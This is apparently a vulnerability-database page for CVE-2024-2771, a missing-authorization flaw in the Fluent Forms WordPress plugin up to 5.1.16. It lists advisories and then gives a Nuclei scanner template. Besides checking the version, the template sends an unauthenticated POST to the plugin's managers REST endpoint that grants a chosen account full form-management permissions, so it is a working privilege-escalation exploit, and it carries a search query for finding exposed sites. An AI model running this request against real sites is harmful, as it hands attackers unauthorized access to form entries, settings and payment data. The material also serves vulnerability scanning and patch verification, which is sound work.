| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Missing Authorization in Fluentforms Contact_Form | 3 Aug 2025 06:06 | – | githubexploit |
| CVE-2024-2771 | 21 May 2024 15:30 | – | circl |
| WordPress plugin Fluent Forms security vulnerability | 18 May 2024 00:00 | – | cnnvd |
| CVE-2024-2771 | 18 May 2024 07:38 | – | cve |
| CVE-2024-2771 Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.16 - Missing Authorization to Settings Update and Limited Privilege Escalation | 18 May 2024 07:38 | – | cvelist |
| EUVD-2024-27715 | 18 May 2024 07:38 | – | euvd |
| CVE-2024-2771 | 18 May 2024 08:15 | – | nvd |
| CVE-2024-2771 | 18 May 2024 08:15 | – | osv |
| WordPress FluentForm Plugin <= 5.1.16 is vulnerable to Privilege Escalation | 20 May 2024 00:00 | – | patchstack |
| WordPress FluentForm plugin <= 5.1.16 - Missing Authorization to Settings Update and Limited Privilege Escalation vulnerability | 20 May 2024 01:12 | – | patchstack |

```yaml
id: CVE-2024-2771

info:
  name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
  impact: |
    Unauthenticated attackers can grant Fluent Form management permissions to any user account, providing access to all plugin settings and sensitive data.
  remediation: |
    Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2771-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2771
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2771
    cwe-id: CWE-862
    epss-score: 0.02333
    epss-percentile: 0.81476
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/fluentform/"
    vendor: fluentforms
    product: contact_form
    framework: wordpress
  tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 5.1.17')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-json/fluentform/v1/managers HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate, br

        {
          "manager": {
            "email": "{{email}}",
            "permissions": [
              "fluentform_dashboard_access",
              "fluentform_forms_manager",
              "fluentform_entries_viewer",
              "fluentform_manage_entries",
              "fluentform_view_payments",
              "fluentform_manage_payments",
              "fluentform_settings_manager",
              "fluentform_full_access"
            ]
          }
        }

    # exploit requires an existing user email address to work.
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Manager has been saved.','{{email}}')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 490a0046304402202f8e7cab919e9861784e305655831af3afa758e76d6aee0621d33e2cce09f7e3022033ad390c59f3714ffa2e35a6c3bdf23b4541c18ffb51882b1a32a5e0cf4c521d:922c64590222798bb761d5b6d8e72950
```